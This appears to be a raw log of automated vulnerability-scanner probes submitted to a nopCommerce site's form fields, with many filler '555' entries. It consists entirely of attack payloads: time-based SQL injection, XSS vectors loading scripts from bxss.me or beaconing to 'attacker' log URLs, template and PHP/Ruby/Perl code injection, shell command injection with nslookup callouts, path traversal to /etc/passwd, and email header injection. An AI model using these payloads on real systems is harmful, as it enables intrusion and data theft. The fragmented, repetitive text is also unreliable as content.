Socket.gethostbyname("hitdn"+"elpiksggdc1e6.bxss.me.")[3].to_s)+"
'.print(md5(31337)).'
'+'A'.concat(70-3).concat(22*4).concat(110).concat(71).concat(105).concat(89)+(require'socket'
Socket.gethostbyname('hitnw'+'rsrghitq3bc2e.bxss.me.')[3].to_s)+'
555
esr3KNgJ'; waitfor delay '0:0:15' --
about-nopcommerce
555
555
555
555
about-nopcommerce/.
555
555
idXTeFec'); waitfor delay '0:0:15' --
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
UZgR1F7q')); waitfor delay '0:0:15' --
xfs.bxss.me
-5 OR 743=(SELECT 743 FROM PG_SLEEP(15))--
555
555
555
555
'"
-5) OR 321=(SELECT 321 FROM PG_SLEEP(15))--
555
555
<!--
555'"()&%<zzz><ScRiPt >J81P(9744)</ScRiPt>
555
555
-1)) OR 437=(SELECT 437 FROM PG_SLEEP(15))--
'"()&%<zzz><ScRiPt >J81P(9393)</ScRiPt>
555
555
5559149312
555
555
555
555
GLDAVOfo' OR 942=(SELECT 942 FROM PG_SLEEP(15))--
555
555
bfg6477<s1﹥s2ʺs3ʹhjl6477
555
555
bfgx6801%C0%BEz1%C0%BCz2a%90bcxhjl6801
wFAvqinI') OR 501=(SELECT 501 FROM PG_SLEEP(15))--
9EBldFDS')) OR 775=(SELECT 775 FROM PG_SLEEP(15))--
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
dfb__${98991*97996}__::.x
1'"
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >J81P(9148)</ScRiPt>
555<WZMY6G>HKYFZ[!+!]</WZMY6G>
@@kOuen
555<script>J81P(9034)</script>
555
555<ScR<ScRiPt>IpT>J81P(9744)</sCr<ScRiPt>IpT>
555<ScRiPt
>J81P(9537)</ScRiPt>
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9706></ScRiPt>
555
555
555
555
555<isindex type=image src=1 onerror=J81P(9251)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9340'>
555
555<body onload=J81P(9831)>
555<img src=//xss.bxss.me/t/dot.gif onload=J81P(9056)>
555<img src=xyz OnErRor=J81P(9715)>
555
555<img/src=">" onerror=alert(9980)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%38%31%50%289725%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\J81P(9140)\u003C/sCripT\u003E
555<ScRiPt>J81P(9221)</sCripT>
555
%F6<img zzz onmouseover=J81P(99481) //%F6>
555<input autofocus onfocus=J81P(9322)>
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(J81P(9175))}
555qM4fa
<ScRiPt >J81P(9617)</ScRiPt>
555
555<WDYZKQ>QAZDA[!+!]</WDYZKQ>
555<ifRAme sRc=9994.com></IfRamE>
555
555<aMrzYiW x=9091>
555<img sRc='http://attacker-9303/log.php?
555<a8v7qrB<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+466-466-1=0+0+0+1 --
-1 OR 2+907-907-1=0+0+0+1
-1' OR 2+116-116-1=0+0+0+1 --
-1' OR 2+736-736-1=0+0+0+1 or '5b42jiJv'='
-1" OR 2+904-904-1=0+0+0+1 --
555
555'"()&%<zzz><ScRiPt >jXUi(9615)</ScRiPt>
555
555
555
'"()&%<zzz><ScRiPt >jXUi(9371)</ScRiPt>
if(now()=sysdate(),sleep(15),0)
555
555
555
5559463143
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
VIEnqU3T'; waitfor delay '0:0:15' --
TD4gOsH0'); waitfor delay '0:0:15' --
BfhxpFML')); waitfor delay '0:0:15' --
-5 OR 439=(SELECT 439 FROM PG_SLEEP(15))--
-5) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
-1)) OR 853=(SELECT 853 FROM PG_SLEEP(15))--
0jw0ZgD7' OR 108=(SELECT 108 FROM PG_SLEEP(15))--
rxAhloGm') OR 662=(SELECT 662 FROM PG_SLEEP(15))--
vwYAe5In')) OR 835=(SELECT 835 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
response.write(9282058*9279304)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'+response.write(9282058*9279304)+'
1'"
"+response.write(9282058*9279304)+"
555
echo dnliif$()\ tfqerl\nz^xyu||a #' &echo dnliif$()\ tfqerl\nz^xyu||a #|" &echo dnliif$()\ tfqerl\nz^xyu||a #
&echo vuecvh$()\ zwvkrx\nz^xyu||a #' &echo vuecvh$()\ zwvkrx\nz^xyu||a #|" &echo vuecvh$()\ zwvkrx\nz^xyu||a #
|echo xreuwd$()\ dzfanj\nz^xyu||a #' |echo xreuwd$()\ dzfanj\nz^xyu||a #|" |echo xreuwd$()\ dzfanj\nz^xyu||a #
(nslookup hitpsvhigpchtc6147.bxss.me||perl -e "gethostbyname('hitpsvhigpchtc6147.bxss.me')")
$(nslookup hitueiuvnfeqv12c01.bxss.me||perl -e "gethostbyname('hitueiuvnfeqv12c01.bxss.me')")
&nslookup hitszrlnoonbe0a2b7.bxss.me&'\"`0&nslookup hitszrlnoonbe0a2b7.bxss.me&`'
&(nslookup hitmilnrlrporedfd8.bxss.me||perl -e "gethostbyname('hitmilnrlrporedfd8.bxss.me')")&'\"`0&(nslookup hitmilnrlrporedfd8.bxss.me||perl -e "gethostbyname('hitmilnrlrporedfd8.bxss.me')")&`'
@@IT1yP
555
|(nslookup hitesdisdebcoe8363.bxss.me||perl -e "gethostbyname('hitesdisdebcoe8363.bxss.me')")
`(nslookup hitwajeqnziclba920.bxss.me||perl -e "gethostbyname('hitwajeqnziclba920.bxss.me')")`
;(nslookup hitteiapohnzkc2c0c.bxss.me||perl -e "gethostbyname('hitteiapohnzkc2c0c.bxss.me')")|(nslookup hitteiapohnzkc2c0c.bxss.me||perl -e "gethostbyname('hitteiapohnzkc2c0c.bxss.me')")&(nslookup hitteiapohnzkc2c0c.bxss.me||perl -e "gethostbyname('hitteiapohnzkc2c0c.bxss.me')")
555
555
555
555
555
555
555
555
555
555
555
d6cbhSTG
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555
555
../555
555
555
555
555
555
555
555
bcc:074625.678-8750.678.8b6ca.19270.2@bxss.me
555
555
to@example.com>
bcc:074625.678-8751.678.8b6ca.19270.2@bxss.me
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
${9999129+9999217}
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
)
555&n949553=v941391
!(()&&!|*|*|
Http://bxss.me/t/fit.txt
'"()
^(#$!@#$)(()))******
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
/etc/shells
555
555
c:/windows/win.ini
555
555'&&sleep(27*1000)*anybva&&'
bxss.me
555"&&sleep(27*1000)*pveeqw&&"
555
555'||sleep(27*1000)*obtrlf||'
555
555"||sleep(27*1000)*dtwrcj||"
'.gethostbyname(lc('hitjs'.'puxsesxm80577.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(71).chr(119).chr(89).'
".gethostbyname(lc("hitxo"."hiuyvbxa2ce10.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(69).chr(104).chr(75)."
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(114).concat(90).concat(103).concat(86)+(require"socket"
Socket.gethostbyname("hitdr"+"ljnrnzfe1426b.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(122).concat(79).concat(101).concat(82)+(require'socket'
Socket.gethostbyname('hitpj'+'pfpbhpve2b87d.bxss.me.')[3].to_s)+'
about-nopcommerce
555
555
555
about-nopcommerce/.
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
555
555
'"
555
555'"()&%<zzz><ScRiPt >XUh3(9356)</ScRiPt>
<!--
555
555
'"()&%<zzz><ScRiPt >XUh3(9777)</ScRiPt>
555
5559131262
555
555
bfg1723<s1﹥s2ʺs3ʹhjl1723
555
bfgx6451%C0%BEz1%C0%BCz2a%90bcxhjl6451
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >XUh3(9619)</ScRiPt>
555<WW7WJH>C9BSC[!+!]</WW7WJH>
555<script>XUh3(9760)</script>
555<ScR<ScRiPt>IpT>XUh3(9941)</sCr<ScRiPt>IpT>
555<ScRiPt
>XUh3(9875)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9831></ScRiPt>
555<isindex type=image src=1 onerror=XUh3(9644)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9357'>
555<body onload=XUh3(9860)>
555<img src=//xss.bxss.me/t/dot.gif onload=XUh3(9038)>
555<img src=xyz OnErRor=XUh3(9618)>
555<img/src=">" onerror=alert(9268)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%58%55%68%33%289614%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\XUh3(9464)\u003C/sCripT\u003E
555<ScRiPt>XUh3(9657)</sCripT>
%F6<img zzz onmouseover=XUh3(96111) //%F6>
555<input autofocus onfocus=XUh3(9515)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(XUh3(9813))}
555odkX0
<ScRiPt >XUh3(9189)</ScRiPt>
555<WLPOYQ>BOHDQ[!+!]</WLPOYQ>
555<ifRAme sRc=9089.com></IfRamE>
555<a599LLY x=9061>
555<img sRc='http://attacker-9814/log.php?
555<arjNVSY<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >BMSE(9341)</ScRiPt>
'"()&%<zzz><ScRiPt >BMSE(9141)</ScRiPt>
5559630345
555
555
bfg7274<s1﹥s2ʺs3ʹhjl7274
555
bfgx3189%C0%BEz1%C0%BCz2a%90bcxhjl3189
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >BMSE(9554)</ScRiPt>
555
555<WAYFPV>J2USQ[!+!]</WAYFPV>
555
555
555<script>BMSE(9992)</script>
555
555<ScR<ScRiPt>IpT>BMSE(9722)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>BMSE(9216)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9404></ScRiPt>
555
555<isindex type=image src=1 onerror=BMSE(9581)>
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9487'>
555
555<body onload=BMSE(9868)>
555
555
555<img src=//xss.bxss.me/t/dot.gif onload=BMSE(9133)>
555
555<img src=xyz OnErRor=BMSE(9220)>
555
555<img/src=">" onerror=alert(9678)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%42%4D%53%45%289458%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\BMSE(9755)\u003C/sCripT\u003E
555
555
555<ScRiPt>BMSE(9473)</sCripT>
555
%F6<img zzz onmouseover=BMSE(94481) //%F6>
555
555<input autofocus onfocus=BMSE(9571)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555
555}body{zzz:Expre/**/SSion(BMSE(9790))}
555
555VxDBS
<ScRiPt >BMSE(9475)</ScRiPt>
555
555<W1ADTP>KANKB[!+!]</W1ADTP>
555<ifRAme sRc=9390.com></IfRamE>
555<aCABdaW x=9182>
555<img sRc='http://attacker-9596/log.php?
555<apu0mcq<
555'"()&%<zzz><ScRiPt >wsbA(9278)</ScRiPt>
'"()&%<zzz><ScRiPt >wsbA(9376)</ScRiPt>
5559275550
bfg5112<s1﹥s2ʺs3ʹhjl5112
bfgx2772%C0%BEz1%C0%BCz2a%90bcxhjl2772
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >wsbA(9590)</ScRiPt>
555<WTRRQ4>SJZ7K[!+!]</WTRRQ4>
555<script>wsbA(9039)</script>
555<ScR<ScRiPt>IpT>wsbA(9983)</sCr<ScRiPt>IpT>
555<ScRiPt
>wsbA(9913)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9881></ScRiPt>
555<isindex type=image src=1 onerror=wsbA(9196)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9846'>
555<body onload=wsbA(9484)>
555<img src=//xss.bxss.me/t/dot.gif onload=wsbA(9877)>
555<img src=xyz OnErRor=wsbA(9648)>
555<img/src=">" onerror=alert(9715)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%73%62%41%289197%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\wsbA(9647)\u003C/sCripT\u003E
555<ScRiPt>wsbA(9075)</sCripT>
%F6<img zzz onmouseover=wsbA(93301) //%F6>
555<input autofocus onfocus=wsbA(9619)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(wsbA(9224))}
555RMgF8
<ScRiPt >wsbA(9767)</ScRiPt>
555<WJWHV8>YZLVT[!+!]</WJWHV8>
555<ifRAme sRc=9494.com></IfRamE>
555<a297oW0 x=9415>
555<img sRc='http://attacker-9846/log.php?
555<aoaV2ne<
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >CRLd(9146)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >CRLd(9319)</ScRiPt>
555
5559737160
-1 OR 2+455-455-1=0+0+0+1 --
-1 OR 3+455-455-1=0+0+0+1 --
-1 OR 2+161-161-1=0+0+0+1
-1 OR 3+161-161-1=0+0+0+1
-1' OR 2+373-373-1=0+0+0+1 --
555
-1' OR 3+373-373-1=0+0+0+1 --
-1' OR 2+872-872-1=0+0+0+1 or 'TL1gb2BZ'='
-1' OR 3+872-872-1=0+0+0+1 or 'TL1gb2BZ'='
-1" OR 2+395-395-1=0+0+0+1 --
-1" OR 3+395-395-1=0+0+0+1 --
bfg2152<s1﹥s2ʺs3ʹhjl2152
555
bfgx2937%C0%BEz1%C0%BCz2a%90bcxhjl2937
555
if(now()=sysdate(),sleep(15),0)
response.write(9450153*9307599)
'+response.write(9450153*9307599)+'
"+response.write(9450153*9307599)+"
/../../../../../../../../../../windows/system32/BITSADMIN.exe
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
echo chupdg$()\ qxvwvg\nz^xyu||a #' &echo chupdg$()\ qxvwvg\nz^xyu||a #|" &echo chupdg$()\ qxvwvg\nz^xyu||a #
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
&echo djtjsz$()\ stubzv\nz^xyu||a #' &echo djtjsz$()\ stubzv\nz^xyu||a #|" &echo djtjsz$()\ stubzv\nz^xyu||a #
555
|echo oudpuh$()\ ijdguh\nz^xyu||a #' |echo oudpuh$()\ ijdguh\nz^xyu||a #|" |echo oudpuh$()\ ijdguh\nz^xyu||a #
(nslookup hitfvrstvyahh3f903.bxss.me||perl -e "gethostbyname('hitfvrstvyahh3f903.bxss.me')")
$(nslookup hitdjqtxyyzmz90d0d.bxss.me||perl -e "gethostbyname('hitdjqtxyyzmz90d0d.bxss.me')")
&nslookup hitjgoehrpweg26fe2.bxss.me&'\"`0&nslookup hitjgoehrpweg26fe2.bxss.me&`'
&(nslookup hitzjagtkhvrpf0d13.bxss.me||perl -e "gethostbyname('hitzjagtkhvrpf0d13.bxss.me')")&'\"`0&(nslookup hitzjagtkhvrpf0d13.bxss.me||perl -e "gethostbyname('hitzjagtkhvrpf0d13.bxss.me')")&`'
|(nslookup hittmaletamllfb2cf.bxss.me||perl -e "gethostbyname('hittmaletamllfb2cf.bxss.me')")
`(nslookup hiteumydrmewu776ac.bxss.me||perl -e "gethostbyname('hiteumydrmewu776ac.bxss.me')")`
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
;(nslookup hitgxyekvylmac701b.bxss.me||perl -e "gethostbyname('hitgxyekvylmac701b.bxss.me')")|(nslookup hitgxyekvylmac701b.bxss.me||perl -e "gethostbyname('hitgxyekvylmac701b.bxss.me')")&(nslookup hitgxyekvylmac701b.bxss.me||perl -e "gethostbyname('hitgxyekvylmac701b.bxss.me')")
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
do5LyXnI
555
dfb{{98991*97996}}xca
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
dfb[[${98991*97996}]]xca
../
./
555
555
-1; waitfor delay '0:0:15' --
dfb__${98991*97996}__::.x
555
-1); waitfor delay '0:0:15' --
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-1)); waitfor delay '0:0:15' --
555
555<ScRiPt >CRLd(9198)</ScRiPt>
555
555<W1HDMT>CRKGR[!+!]</W1HDMT>
1 waitfor delay '0:0:15' --
555
555<script>CRLd(9086)</script>
bcc:074625.678-195605.678.8b6ca.19270.2@bxss.me
to@example.com>
bcc:074625.678-195606.678.8b6ca.19270.2@bxss.me
NsaXarZW'; waitfor delay '0:0:15' --
555
555<ScR<ScRiPt>IpT>CRLd(9388)</sCr<ScRiPt>IpT>
555
su7XblDg'); waitfor delay '0:0:15' --
<esi:include src="http://bxss.me/rpb.png"/>
555
555<ScRiPt
>CRLd(9470)</ScRiPt>
v5OYM2Mb')); waitfor delay '0:0:15' --
${9999007+9999079}
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9213></ScRiPt>
-5 OR 471=(SELECT 471 FROM PG_SLEEP(15))--
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
/etc/shells
c:/windows/win.ini
bxss.me
&n998382=v992841
555
-5) OR 474=(SELECT 474 FROM PG_SLEEP(15))--
555
)
!(()&&!|*|*|
555<isindex type=image src=1 onerror=CRLd(9880)>
^(#$!@#$)(()))******
-1)) OR 180=(SELECT 180 FROM PG_SLEEP(15))--
'"()
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9630'>
'&&sleep(27*1000)*astfhn&&'
CsaOIVT1' OR 336=(SELECT 336 FROM PG_SLEEP(15))--
"&&sleep(27*1000)*knyfrv&&"
555
'||sleep(27*1000)*lnwsfw||'
"||sleep(27*1000)*kgwwmq||"
555<body onload=CRLd(9442)>
555
iP6BWY5W') OR 179=(SELECT 179 FROM PG_SLEEP(15))--
555<img src=//xss.bxss.me/t/dot.gif onload=CRLd(9425)>
'.gethostbyname(lc('hitie'.'qpmwjyel9b96d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(77).chr(118).chr(88).'
".gethostbyname(lc("hitsx"."jzctbatv990de.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(74).chr(106).chr(84)."
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
555
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555<img src=xyz OnErRor=CRLd(9453)>
NB3b2cgn')) OR 776=(SELECT 776 FROM PG_SLEEP(15))--
ctime
sleep
p0
(I30
tp1
Rp2
.
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555<img/src=">" onerror=alert(9605)>
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
"+"A".concat(70-3).concat(22*4).concat(111).concat(80).concat(117).concat(72)+(require"socket"
Socket.gethostbyname("hitiu"+"ipsgcbpo7c32b.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(98).concat(84).concat(113).concat(72)+(require'socket'
Socket.gethostbyname('hitdd'+'eqfnagisd3558.bxss.me.')[3].to_s)+'
%35%35%35%3C%53%63%52%69%50%74%20%3E%43%52%4C%64%289568%29%3C%2F%73%43%72%69%70%54%3E
555
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
about-nopcommerce
555\u003CScRiPt\CRLd(9750)\u003C/sCripT\u003E
1'"
@@GLe6T
about-nopcommerce/.
555
555<ScRiPt>CRLd(9528)</sCripT>
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
%F6<img zzz onmouseover=CRLd(95571) //%F6>
555
xfs.bxss.me
'"
<!--
555
555<input autofocus onfocus=CRLd(9282)>
'"()&%<zzz><ScRiPt >qhJp(9696)</ScRiPt>
555
'"()&%<zzz><ScRiPt >qhJp(9405)</ScRiPt>
9299727
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
bfg6329<s1﹥s2ʺs3ʹhjl6329
bfgx1445%C0%BEz1%C0%BCz2a%90bcxhjl1445
555}body{zzz:Expre/**/SSion(CRLd(9141))}
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555kqpH8
<ScRiPt >CRLd(9623)</ScRiPt>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
555<WWKGMJ>EMF5B[!+!]</WWKGMJ>
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
555<ifRAme sRc=9485.com></IfRamE>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >qhJp(9589)</ScRiPt>
555<aqACUaW x=9827>
<WEAHHH>5YXRW[!+!]</WEAHHH>
555<img sRc='http://attacker-9502/log.php?
<script>qhJp(9680)</script>
<ScR<ScRiPt>IpT>qhJp(9493)</sCr<ScRiPt>IpT>
555<ahp2Phc<
<ScRiPt
>qhJp(9703)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9921></ScRiPt>
<isindex type=image src=1 onerror=qhJp(9705)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9417'>
<body onload=qhJp(9600)>
<img src=//xss.bxss.me/t/dot.gif onload=qhJp(9077)>
<img src=xyz OnErRor=qhJp(9143)>
<img/src=">" onerror=alert(9348)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%71%68%4A%70%289982%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\qhJp(9282)\u003C/sCripT\u003E
<ScRiPt>qhJp(9331)</sCripT>
%F6<img zzz onmouseover=qhJp(99301) //%F6>
<input autofocus onfocus=qhJp(9630)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(qhJp(9535))}
qtxwA
<ScRiPt >qhJp(9653)</ScRiPt>
<WMRUJ1>PPSU6[!+!]</WMRUJ1>
<ifRAme sRc=9479.com></IfRamE>
<awKeLJl x=9750>
<img sRc='http://attacker-9032/log.php?
<aJxgXCK<


555'"()&%<zzz><ScRiPt >0TwD(9796)</ScRiPt>
555
'"()&%<zzz><ScRiPt >0TwD(9476)</ScRiPt>
555
5559999953
555
bfg2929<s1﹥s2ʺs3ʹhjl2929
555
bfgx2723%C0%BEz1%C0%BCz2a%90bcxhjl2723
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >0TwD(9993)</ScRiPt>
555
555<WIYEGB>PARDZ[!+!]</WIYEGB>
555
555<script>0TwD(9879)</script>
555
555<ScR<ScRiPt>IpT>0TwD(9988)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>0TwD(9817)</ScRiPt>
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9811></ScRiPt>
555<isindex type=image src=1 onerror=0TwD(9147)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9791'>
555
555<body onload=0TwD(9155)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=0TwD(9804)>
555
555<img src=xyz OnErRor=0TwD(9038)>
555
555<img/src=">" onerror=alert(9000)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%30%54%77%44%289460%29%3C%2F%73%43%72%69%70%54%3E
555
555
555\u003CScRiPt\0TwD(9950)\u003C/sCripT\u003E
555
555<ScRiPt>0TwD(9590)</sCripT>
555
%F6<img zzz onmouseover=0TwD(98161) //%F6>
555
555<input autofocus onfocus=0TwD(9563)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(0TwD(9823))}
555
555QXi0r
<ScRiPt >0TwD(9003)</ScRiPt>
555
555<WCSHST>O5OZU[!+!]</WCSHST>
555
555<ifRAme sRc=9507.com></IfRamE>
555
555<aqdNuxk x=9107>
555
555<img sRc='http://attacker-9099/log.php?
555
555<aQWzlB4<